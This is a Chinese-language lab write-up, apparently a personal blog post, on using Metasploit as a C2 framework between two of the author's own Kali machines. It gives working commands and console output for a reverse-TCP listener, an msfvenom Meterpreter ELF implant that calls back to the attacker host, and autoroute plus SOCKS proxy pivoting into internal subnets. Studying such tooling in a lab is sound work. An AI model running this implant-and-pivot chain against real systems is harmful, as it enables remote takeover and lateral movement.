MSF的使用(一)

[!说明]
MSF是一个kali上自带的c2框架,总结就是一个字: 好!
作为老牌框架,自然还是打磨的不错的,现在学习一下也方便自己后续开发相关模块提供思路,了解了解有啥不足的!

测试环境:

两台kali linux,左右脑互博!(一个wsl,一个VM上的)
刚好利用wsl的镜像模式,使得VM能通wsl,但是wsl无法直接通VM,刚好是反向代理的使用场景!

模拟的场景为:

VM虚拟机为被目标靶机,有存在漏洞的web服务,通过getshell上传msf木马至服务器
wsl模拟一个公网上的c2控制端,负责对靶机进行后渗透利用

搞!!!

通过webshell作为入口点上去

msf 起监听

1
2
3
4
5
6
7
8
9
10
msf6 >
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 172.17.113.211
LHOST => 172.17.113.211
msf6 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf6 exploit(multi/handler) > run

msf生成木马

1
2
3
4
5
6
7
┌──(kali㉿Hack3rr)-[~]
└─$ msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=172.17.113.211 LPORT=4444 -f elf > shell.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 1068952 bytes
Final size of elf file: 1068952 bytes

然后目标执行木马上线拿到会话查看路由

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
meterpreter > run autoroute -p
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]

Active Routing Table
====================

   Subnet             Netmask            Gateway
   ------             -------            -------
   192.168.77.0       255.255.255.0      Session 1
   192.168.207.0      255.255.255.0      Session 1

...

msf6 post(multi/manage/autoroute) > route

IPv4 Active Routing Table
=========================

   Subnet             Netmask            Gateway
   ------             -------            -------
   192.168.77.0       255.255.255.0      Session 1
   192.168.207.0      255.255.255.0      Session 1

[*] There are currently no IPv6 routes defined.


msf6 post(multi/manage/autoroute) > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > options

Module options (auxiliary/server/socks_proxy):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on th
                                       e local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  1080             yes       The port to listen on
   VERSION  5                yes       The SOCKS version to use (Accepted: 4a, 5)


   When VERSION is 5:

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        Proxy password for SOCKS5 listener
   USERNAME                   no        Proxy username for SOCKS5 listener


Auxiliary action:

   Name   Description
   ----   -----------
   Proxy  Run a SOCKS proxy server



View the full module info with the info, or info -d command.
msf6 auxiliary(server/socks_proxy) > jobs

Jobs
====

  Id  Name                           Payload  Payload opts
  --  ----                           -------  ------------
  0   Auxiliary: server/socks_proxy

然后就可以产生一个sock5的代理了这应该是一个正向代理,应为代理端应该是存在攻击端(客户端)

内网渗透之代理转发 - FreeBuf网络安全行业门户